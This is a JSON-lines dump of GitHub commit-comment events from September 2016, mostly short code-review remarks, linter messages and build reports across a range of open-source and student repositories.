{"id":"4544526678","type":"CommitCommentEvent","actor":{"login":"Reyfin"},"repo":{"name":"dklollol/Olsen-Framework-Arma-3"},"payload":{"comment":{"id":18974651,"position":null,"line":null,"path":null,"commit_id":"cf0853412efdc2c610cc3093d9021fcc899fb82e","created_at":"2016-09-10T18:54:06Z","updated_at":"2016-09-10T18:54:06Z","body":"Had a Merge conflict and pushed the wrong changes"}},"created_at":"2016-09-10T18:54:06Z"}
{"id":"4544526931","type":"CommitCommentEvent","actor":{"login":"FeodorFitsner"},"repo":{"name":"appveyor/website"},"payload":{"comment":{"id":18974652,"position":null,"line":null,"path":null,"commit_id":"bc6a4863331d5b89bed82f13a192479519747891","created_at":"2016-09-10T18:54:18Z","updated_at":"2016-09-10T18:54:18Z","body":"Good, catch. Updated!"}},"created_at":"2016-09-10T18:54:18Z"}
{"id":"4544527181","type":"CommitCommentEvent","actor":{"login":"SpaceToastCoastToCoast"},"repo":{"name":"SpaceToastCoastToCoast/Cash-Register"},"payload":{"comment":{"id":18974653,"position":13,"line":112,"path":"js/cash_register.js","commit_id":"51873e54b208d4bfcd8da787aec18e6383858ca2","created_at":"2016-09-10T18:54:29Z","updated_at":"2016-09-10T18:54:29Z","body":"The `setTimeout` allows a one-second delay before resuming the update interval. Before I added setTimeout my update interval would clear the error message immediately after my 100ms interval time, making it difficult to read."}},"created_at":"2016-09-10T18:54:29Z"}
{"id":"4544527183","type":"CommitCommentEvent","actor":{"login":"yscoder"},"repo":{"name":"yscoder/hexo-theme-indigo"},"payload":{"comment":{"id":18974654,"position":null,"line":null,"path":null,"commit_id":"cb01e2e6b19f21345756207041dafc7b3ff20cff","created_at":"2016-09-10T18:54:29Z","updated_at":"2016-09-10T18:54:29Z","body":"close #79"}},"created_at":"2016-09-10T18:54:29Z"}
{"id":"4544527647","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974656,"position":1,"line":1,"path":"src/am/aca/musicapp/controller/Main.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T18:54:51Z","updated_at":"2016-09-10T18:54:51Z","body":"Main class package instead of \r\nam.aca.musicapp.controller;\r\ncan be here\r\nam.aca.musicapp;\r\nBecause of Main class doesn't controller."}},"created_at":"2016-09-10T18:54:51Z"}
{"id":"4544527830","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974657,"position":null,"line":null,"path":null,"commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T18:55:01Z","updated_at":"2016-09-10T18:55:01Z","body":"Другое дело! :)"}},"created_at":"2016-09-10T18:55:01Z"}
{"id":"4544529896","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974662,"position":10,"line":10,"path":"src/am/aca/musicapp/comman/bean/Album.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T18:56:28Z","updated_at":"2016-09-10T18:56:28Z","body":"instead of album_ID you can write just id, or albumId."}},"created_at":"2016-09-10T18:56:28Z"}
{"id":"4544531862","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974665,"position":-12,"line":-12,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:57:59Z","updated_at":"2016-09-10T18:57:59Z","body":"Don't use parentheses around a method call."}},"created_at":"2016-09-10T18:57:59Z"}
{"id":"4544531911","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974668,"position":-12,"line":-12,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:58:02Z","updated_at":"2016-09-10T18:58:02Z","body":"Line is too long. [120/80]"}},"created_at":"2016-09-10T18:58:02Z"}
{"id":"4544531949","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974669,"position":-12,"line":-12,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:58:04Z","updated_at":"2016-09-10T18:58:04Z","body":"Don't use parentheses around a method call."}},"created_at":"2016-09-10T18:58:04Z"}
{"id":"4544532000","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974670,"position":-12,"line":-12,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:58:08Z","updated_at":"2016-09-10T18:58:08Z","body":"Surrounding space missing for operator +."}},"created_at":"2016-09-10T18:58:08Z"}
{"id":"4544532042","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974671,"position":18,"line":55,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T18:58:10Z","updated_at":"2016-09-10T18:58:10Z","body":"Вот это не сработает, потому что по факту ты вызываешь метод `Train` у текущего объекта, то есть у объекта класса `Train`, а такого метода в нём нет. Нужно так: `station.add_train(self)`."}},"created_at":"2016-09-10T18:58:10Z"}
{"id":"4544532691","type":"CommitCommentEvent","actor":{"login":"wakaber"},"repo":{"name":"nitrogen-os-devices/android_vendor_lge_hammerhead"},"payload":{"comment":{"id":18974672,"position":null,"line":null,"path":null,"commit_id":"d7a5ed70db5628c780d3dd14181b0e70451003e6","created_at":"2016-09-10T18:58:41Z","updated_at":"2016-09-10T18:58:41Z","body":"@Mr-MEX \r\nДа зависимости я знаю, через readelf -d их смотрю.\r\n\r\nЯ из Nexus 5x взяла libmmjpeg(dma) и enc, с ними фотки заработали, но либы камеры не взлетают или я что-то не так делаю :<\r\nМожешь поэкспериментировать и вытащить их из вендор образа N5x тоже, если не лень."}},"created_at":"2016-09-10T18:58:41Z"}
{"id":"4544532892","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974674,"position":17,"line":54,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T18:58:49Z","updated_at":"2016-09-10T18:58:49Z","body":"Ты здесь индексу присваиваешь объект станции? Думаю можно просто увеличивать индекс на `1`."}},"created_at":"2016-09-10T18:58:49Z"}
{"id":"4544533460","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":18974675,"position":2,"line":1,"path":"challenge_4/answer4.rb","commit_id":"b5ebbb70eec297804f662d3a34118055dc4ad181","created_at":"2016-09-10T18:59:17Z","updated_at":"2016-09-10T18:59:17Z","body":"This is NOT how you create a hash"}},"created_at":"2016-09-10T18:59:17Z"}
{"id":"4544533766","type":"CommitCommentEvent","actor":{"login":"Noah-T"},"repo":{"name":"codeforboston/cambridge_voting_locations"},"payload":{"comment":{"id":18974678,"position":null,"line":null,"path":null,"commit_id":"a5bb091cb4e03226fb80f7c9d61fbb2a2e85fdb2","created_at":"2016-09-10T18:59:32Z","updated_at":"2016-09-10T18:59:32Z","body":"You're absolutely right. Thanks for the reminder. "}},"created_at":"2016-09-10T18:59:32Z"}
{"id":"4544533902","type":"CommitCommentEvent","actor":{"login":"Coacher"},"repo":{"name":"2ion/mpv-bash-completion"},"payload":{"comment":{"id":18974679,"position":null,"line":null,"path":null,"commit_id":"730f77c42fa4fffd1bd8b58d50c1531028794aa3","created_at":"2016-09-10T18:59:37Z","updated_at":"2016-09-10T18:59:37Z","body":"Thank you very much that you delivered fix so fast, but this is now fixed upstream: https://github.com/mpv-player/mpv/commit/fc1c004cd8b869f268e3d8eb3bf605bc39902e99"}},"created_at":"2016-09-10T18:59:37Z"}
{"id":"4544534229","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974680,"position":28,"line":63,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T18:59:53Z","updated_at":"2016-09-10T18:59:53Z","body":"По-моему, это лишнее. Ведь мы уже знаем индекс текущей станции, значит следующая станция будет иметь текущий индекс + 1."}},"created_at":"2016-09-10T18:59:53Z"}
{"id":"4544534351","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18974681,"position":null,"line":null,"path":null,"commit_id":"586d05e28bfb005bea2b7e7f1c156d9fd16d7f38","created_at":"2016-09-10T18:59:58Z","updated_at":"2016-09-10T18:59:58Z","body":"@atamariya All the image commits could probably with @valib work but perhaps a separated PR should be pushed ?"}},"created_at":"2016-09-10T18:59:58Z"}
{"id":"4544535657","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974685,"position":37,"line":72,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T19:00:45Z","updated_at":"2016-09-10T19:00:45Z","body":"Почему не так: `@current_route.full_route[@current_station_index - 1]`?"}},"created_at":"2016-09-10T19:00:45Z"}
{"id":"4544536350","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18974686,"position":5,"line":8,"path":"app/embed-box.styl","commit_id":"a30955cfa7b01319381557e72fc9dfafb0af7479","created_at":"2016-09-10T19:01:13Z","updated_at":"2016-09-10T19:01:13Z","body":"This doesn’t make sense to me. The inline version default styling should probably be something close to the demo we have at the top of the embedbox.io (minus the close button [since that was is a mock modal]) or the inline ones in the docs section. In either case, we size them roughly to ~500–600px square, and I think that makes sense. I can totally see a responsive `max-height 100vh` and `max-width 100vw`, and the `min-height` you have makes sense to me as well.\r\n\r\nWhat we’re getting with this default now (on https://eager.io/blog/introducing-embedbox-open-source-embed-code-ui/ e.g.) is a strange “inline-modal” look.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/154613/18412833/a7c390ac-7766-11e6-9a4b-3dbcb3efea59.png)\r\n\r\nThis reminds me: when the inline version _is_ displayed this big (which we should discourage, but of course we can’t really prevent), then it should probably handle this case differently, and look more like a column and not a modal.\r\n\r\nSomething like this:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/154613/18412867/5afaa50c-7767-11e6-9182-ca7d1c359faf.png)\r\n"}},"created_at":"2016-09-10T19:01:13Z"}
{"id":"4544537187","type":"CommitCommentEvent","actor":{"login":"desoss"},"repo":{"name":"deib-polimi/diceH2020-space4cloud-webGUI"},"payload":{"comment":{"id":18974688,"position":null,"line":null,"path":null,"commit_id":"eeee58e3c5874185f52508a13a4fe5af217d8cba","created_at":"2016-09-10T19:01:47Z","updated_at":"2016-09-10T19:01:47Z","body":"The attribute InstanceData in Experiment is used only as support in the input upload phase.\r\nIt's @Transient, so it's not saved in the DB.\r\nThat's why errors were raised only on relaunch.\r\n"}},"created_at":"2016-09-10T19:01:47Z"}
{"id":"4544538817","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974691,"position":4,"line":4,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T19:03:00Z","updated_at":"2016-09-10T19:03:00Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T19:03:00Z"}
{"id":"4544538836","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974692,"position":5,"line":5,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T19:03:01Z","updated_at":"2016-09-10T19:03:01Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T19:03:01Z"}
{"id":"4544538896","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974693,"position":6,"line":6,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T19:03:03Z","updated_at":"2016-09-10T19:03:03Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T19:03:03Z"}
{"id":"4544538917","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974694,"position":10,"line":10,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T19:03:04Z","updated_at":"2016-09-10T19:03:04Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T19:03:04Z"}
{"id":"4544538925","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974695,"position":10,"line":10,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T19:03:06Z","updated_at":"2016-09-10T19:03:06Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T19:03:06Z"}
{"id":"4544538984","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974696,"position":11,"line":11,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T19:03:07Z","updated_at":"2016-09-10T19:03:07Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T19:03:07Z"}
{"id":"4544539053","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974698,"position":13,"line":13,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T19:03:10Z","updated_at":"2016-09-10T19:03:10Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T19:03:10Z"}
{"id":"4544539326","type":"CommitCommentEvent","actor":{"login":"ArsenShnurkov"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":18974700,"position":null,"line":null,"path":null,"commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-10T19:03:22Z","updated_at":"2016-09-10T19:03:22Z","body":"and after making it private GitExtensions build gives the error:\r\nUserControls/ConsoleEmulatorOutputControl.cs(88,19): error CS0122: `Microsoft.Build.Utilities.CommandLineBuilder' is inaccessible due to its protection level\r\n\t\t\t\t/usr/lib/mono/gac/ConEmu.WinForms/1.0.0.0__00340228797aafb8/ConEmu.WinForms.dll (Location of the symbol related to previous error)\r\n"}},"created_at":"2016-09-10T19:03:22Z"}
{"id":"4544539370","type":"CommitCommentEvent","actor":{"login":"joachifm"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18974701,"position":null,"line":null,"path":null,"commit_id":"0a6221578aabcc8676b42e76cd261518de2fdd92","created_at":"2016-09-10T19:03:25Z","updated_at":"2016-09-10T19:03:25Z","body":"Using `ExecStart` directly is more compact. `script` makes sense if you need flow control, loops, or need to start more than one process. In this case, it's just an unnecessary indirection, there shouldn't be any practical differences."}},"created_at":"2016-09-10T19:03:25Z"}
{"id":"4544539512","type":"CommitCommentEvent","actor":{"login":"freedoapp"},"repo":{"name":"freedoapp/Fish-and-Kilowatt"},"payload":{"comment":{"id":18974702,"position":null,"line":null,"path":null,"commit_id":"ee98d2319facd75af5a9fbc223032de67617428c","created_at":"2016-09-10T19:03:31Z","updated_at":"2016-09-10T19:03:31Z","body":"Piccole ottimizzazioni e tolto alcune parti commentate"}},"created_at":"2016-09-10T19:03:31Z"}
{"id":"4544540376","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974704,"position":null,"line":null,"path":null,"commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T19:03:56Z","updated_at":"2016-09-10T19:03:56Z","body":"Это: https://github.com/fee1good/thinknetica_ror_beginer/blob/master/lesson_3/disp_app.rb#L101 больше не нужно."}},"created_at":"2016-09-10T19:03:56Z"}
{"id":"4544542800","type":"CommitCommentEvent","actor":{"login":"Hulk1980"},"repo":{"name":"sarcadass/granim.js"},"payload":{"comment":{"id":18974706,"position":5,"line":38,"path":"README.md","commit_id":"1cc742e27d7269208566397a0e4d7054d46f2e6e","created_at":"2016-09-10T19:05:42Z","updated_at":"2016-09-10T19:05:42Z","body":"23"}},"created_at":"2016-09-10T19:05:42Z"}
{"id":"4544542841","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/IRAN12"},"payload":{"comment":{"id":18974707,"position":9,"line":294,"path":"bot/beyondbot.lua","commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-10T19:05:43Z","updated_at":"2016-09-10T19:05:43Z","body":"190409149"}},"created_at":"2016-09-10T19:05:43Z"}
{"id":"4544543012","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974708,"position":27,"line":27,"path":"src/am/aca/musicapp/comman/util/Util.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T19:05:52Z","updated_at":"2016-09-10T19:05:52Z","body":"generateTrackId,getImageNextID -> for be more readable keep same method names similar.\r\ne.g. Your all id generation method names you can write e.g. \r\ngenerateTrackId, generateImageId or\r\ngetNextTrackId, getNextImageId. \r\nNow if they have different kind of names it's a little bit complicated. "}},"created_at":"2016-09-10T19:05:52Z"}
{"id":"4544544112","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974711,"position":24,"line":59,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T19:06:40Z","updated_at":"2016-09-10T19:06:40Z","body":"Тут на самом деле нам нужно показывать именно станцию, а не индекс."}},"created_at":"2016-09-10T19:06:40Z"}
{"id":"4544546002","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974714,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T19:08:04Z","updated_at":"2016-09-10T19:08:04Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-10T19:08:04Z"}
{"id":"4544546006","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974715,"position":51,"line":51,"path":"src/am/aca/musicapp/comman/util/Util.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T19:08:05Z","updated_at":"2016-09-10T19:08:05Z","body":"each time when you need get value you should load file\r\n`properties.load(new FileInputStream(Property_Path));`\r\nYou should load only once and use multiple times then will be faster. Don't forget about performance issues.  "}},"created_at":"2016-09-10T19:08:05Z"}
{"id":"4544546132","type":"CommitCommentEvent","actor":{"login":"nhgrif"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18974716,"position":65,"line":79,"path":"Tests/NSManagedObjectContext+TestSwizzle.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T19:08:10Z","updated_at":"2016-09-10T19:08:10Z","body":"Hmm, I'm not sure this should really be `public`.  It's in the test suite, right?  `internal` (the default) should be fine."}},"created_at":"2016-09-10T19:08:10Z"}
{"id":"4544547341","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18974717,"position":103,"line":103,"path":"app/src/main/java/ru/komaric/birthdayreminder/activity/MainActivity.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-10T19:09:03Z","updated_at":"2016-09-10T19:09:03Z","body":"Может не стоит так писать? Сравнивать только первый элемент в массиве? Это странно выглядит."}},"created_at":"2016-09-10T19:09:03Z"}
{"id":"4544547421","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18974718,"position":null,"line":null,"path":null,"commit_id":"828c690c141e74567d223c32a57555c4d48fe82b","created_at":"2016-09-10T19:09:07Z","updated_at":"2016-09-10T19:09:07Z","body":"❤️"}},"created_at":"2016-09-10T19:09:07Z"}
{"id":"4544547535","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974719,"position":4,"line":7,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T19:09:12Z","updated_at":"2016-09-10T19:09:12Z","body":"Внимательно следи за именами. Я сначала по ошибке подумал что ты в этой переменной сохраняешь индекс станции в массиве станций маршрута. Потом понял что ты сохраняешь именно объект станции. В этом случае переменную надлежит назвать `current_station`."}},"created_at":"2016-09-10T19:09:12Z"}
{"id":"4544548511","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974725,"position":51,"line":51,"path":"src/am/aca/musicapp/controller/Controller.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T19:09:58Z","updated_at":"2016-09-10T19:09:58Z","body":"this method shouldn't be static. "}},"created_at":"2016-09-10T19:09:58Z"}
{"id":"4544548874","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/IRAN12"},"payload":{"comment":{"id":18974726,"position":null,"line":null,"path":null,"commit_id":"fc2cfecc5276a07bb9cd254e83880e23535dea97","created_at":"2016-09-10T19:10:13Z","updated_at":"2016-09-10T19:10:13Z","body":"190409149"}},"created_at":"2016-09-10T19:10:13Z"}
{"id":"4544549422","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974727,"position":33,"line":68,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T19:10:32Z","updated_at":"2016-09-10T19:10:32Z","body":"Где у нас переменная `@station_index` определяется? В методе `show_next_station`. А если я сразу захочу показать предыдущую станцию? То будет исключение, потому что `@station_index` вернёт `nil`.\r\n\r\n`@station_index` нужно сделать методом."}},"created_at":"2016-09-10T19:10:32Z"}
{"id":"4544549689","type":"CommitCommentEvent","actor":{"login":"jzuken"},"repo":{"name":"baydindima/JavaCourse"},"payload":{"comment":{"id":18974728,"position":14,"line":14,"path":"src/main/java/homework1/MultiLazy.java","commit_id":"2fcda69d732d8bec89a403f35e2517fa85f5106d","created_at":"2016-09-10T19:10:44Z","updated_at":"2016-09-10T19:10:44Z","body":"тут как-то пробелов не хватает вроде :)\r\nи в SingleLazy в таком же месте тоже"}},"created_at":"2016-09-10T19:10:44Z"}
{"id":"4544551197","type":"CommitCommentEvent","actor":{"login":"GustavoRuiz9"},"repo":{"name":"GustavoRuiz9/ProjectDrizzle"},"payload":{"comment":{"id":18974729,"position":null,"line":null,"path":null,"commit_id":"4c2790633370616e91154f67b595254e6a27cd35","created_at":"2016-09-10T19:11:45Z","updated_at":"2016-09-10T19:11:45Z","body":"vuelvis"}},"created_at":"2016-09-10T19:11:45Z"}
{"id":"4544551309","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18974730,"position":28,"line":63,"path":"lesson_3/disp_app.rb","commit_id":"7bd203cc4fc9ff1724d76062a48bb1add08b92c0","created_at":"2016-09-10T19:11:49Z","updated_at":"2016-09-10T19:11:49Z","body":"Тут опечатка :) `staiton` вместо `station`."}},"created_at":"2016-09-10T19:11:49Z"}
{"id":"4544551602","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974731,"position":56,"line":56,"path":"src/am/aca/musicapp/controller/Controller.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T19:12:03Z","updated_at":"2016-09-10T19:12:03Z","body":"Your signIn method logic is wrong"}},"created_at":"2016-09-10T19:12:03Z"}
{"id":"4544551841","type":"CommitCommentEvent","actor":{"login":"GalaticStryder"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":18974732,"position":null,"line":null,"path":null,"commit_id":"c0df7ea82ea66c23433bf8ca04ceeba7781c5d03","created_at":"2016-09-10T19:12:15Z","updated_at":"2016-09-10T19:12:15Z","body":"@neobuddy89 Thanks for the hint, I've been using BFS on my laptop recently. I did like the idea of being in the \"dark side\" of Linux (if that exists) but after quite some time of usage, it only does differentiate on latency oriented workloads. The point here was just experimental, I only saw this scheduler on mobile devices once and it was for 3.10 (zen)... I decided to import the patch for 3.4 to see where I could reach but I couldn't debug those boot failures.\r\nDeadline is a great real-time scheduler but I wanted to take a shortcut to BFS + attempt a conversion to use SCHED_ISO to process the frameworks in Android side (stupid idea, though).\r\nIn my laptop, running the schedtool program makes it possible to run a given application in SCHED_ISO instead of SCHED_NORMAL priority and so forth.\r\nI'd probably be able to make work after reading and studying the init context of BFS but I can't get anything from a bootloop stage on my device."}},"created_at":"2016-09-10T19:12:15Z"}
{"id":"4544552072","type":"CommitCommentEvent","actor":{"login":"jzuken"},"repo":{"name":"baydindima/JavaCourse"},"payload":{"comment":{"id":18974733,"position":11,"line":11,"path":"src/main/java/homework1/SingleLazy.java","commit_id":"2fcda69d732d8bec89a403f35e2517fa85f5106d","created_at":"2016-09-10T19:12:25Z","updated_at":"2016-09-10T19:12:25Z","body":"а может без флага всё же как-нибудь обойдёмся? можно же как-то иначе отличить пустое значение от null из Supplier.get()"}},"created_at":"2016-09-10T19:12:25Z"}
{"id":"4544552698","type":"CommitCommentEvent","actor":{"login":"jzuken"},"repo":{"name":"baydindima/JavaCourse"},"payload":{"comment":{"id":18974734,"position":8,"line":8,"path":"src/main/java/homework1/MultiLazy.java","commit_id":"2fcda69d732d8bec89a403f35e2517fa85f5106d","created_at":"2016-09-10T19:12:53Z","updated_at":"2016-09-10T19:12:53Z","body":"volatile явно где-то забыли тут"}},"created_at":"2016-09-10T19:12:53Z"}
{"id":"4544553252","type":"CommitCommentEvent","actor":{"login":"BitcoinBelieverxxx"},"repo":{"name":"mycelium-com/wallet"},"payload":{"comment":{"id":18974735,"position":1,"line":72,"path":"public/mbw/src/main/java/com/mycelium/wallet/activity/ScanActivity.java","commit_id":"285ce55290ee7f1de19f68df150002c8ca71d134","created_at":"2016-09-10T19:13:18Z","updated_at":"2016-09-10T19:13:18Z","body":"https://github.com/BitcoinBelieverxxx/a72d7bc9.git"}},"created_at":"2016-09-10T19:13:18Z"}
{"id":"4544553537","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974736,"position":103,"line":103,"path":"src/am/aca/musicapp/controller/Controller.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T19:13:32Z","updated_at":"2016-09-10T19:13:32Z","body":"signOut method logic is wrong. "}},"created_at":"2016-09-10T19:13:32Z"}
{"id":"4544554301","type":"CommitCommentEvent","actor":{"login":"GustavoRuiz9"},"repo":{"name":"GustavoRuiz9/ProjectDrizzle"},"payload":{"comment":{"id":18974737,"position":null,"line":null,"path":null,"commit_id":"3716530d8bdd00c9049c10504e3279f814fcf187","created_at":"2016-09-10T19:14:05Z","updated_at":"2016-09-10T19:14:05Z","body":"hh"}},"created_at":"2016-09-10T19:14:05Z"}
